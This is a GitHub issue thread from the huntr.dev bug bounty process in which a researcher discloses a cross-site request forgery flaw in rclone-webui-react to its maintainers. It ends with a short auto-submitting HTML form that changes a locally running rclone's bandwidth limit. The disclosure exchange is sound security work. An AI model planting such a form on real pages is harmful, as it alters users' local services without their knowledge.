🚨 Potential Cross-Site Request Forgery (CSRF)

[huntr-helper]

👋 Hello, @negative0, @Greenkeeper[bot], @jackw - a potential high severity Cross-Site Request Forgery (CSRF) vulnerability in your repository has been disclosed to us.

Next Steps

1️⃣ Visit https://huntr.dev/bounties/1-other-rclone/rclone-webui-react for more advisory information.

2️⃣ Sign-up to validate or speak to the researcher for more assistance.

3️⃣ Propose a patch or outsource it to our community - whoever fixes it gets paid.

---

Confused or need more help?

• Join us on our Discord and a member of our team will be happy to help! 🤗

• Speak to a member of our team: @JamieSlome

---

This issue was automatically generated by huntr.dev - a bug bounty board for securing open source code.

[novik8989]

Hi @jackw, @negative0, can you please update the report status to valid at https://huntr.dev/bounties/1-other-rclone/rclone-webui-react/

[negative0]

Hi,
Sorry for the late reply.

I am not able to validate using your HTML script, it keeps on asking for username and password, what options are you using while running rclone?

[novik8989]

Hi @negative0,

I launched rclone using this command:
rclone rcd --rc-web-gui

Revisiting the issue, the problem seems to be the use of address http://127.0.0.1 instead of http://localhost in the POC. So please try the following POC to alter the bandwitch to 1M through CSRF. Also if the server needs credentials then this attack requires the user to be logged in. The logged in user is affected by CSRF just by visiting a malicious page hosted on attacker's website.

// changeBandwidth.html

<form method="POST" action="http://localhost:5572/core/bwlimit?rate=1M">
  <input type="submit" value="CSRF" />
  <script>
    document.forms[0].submit();
  </script>
</form>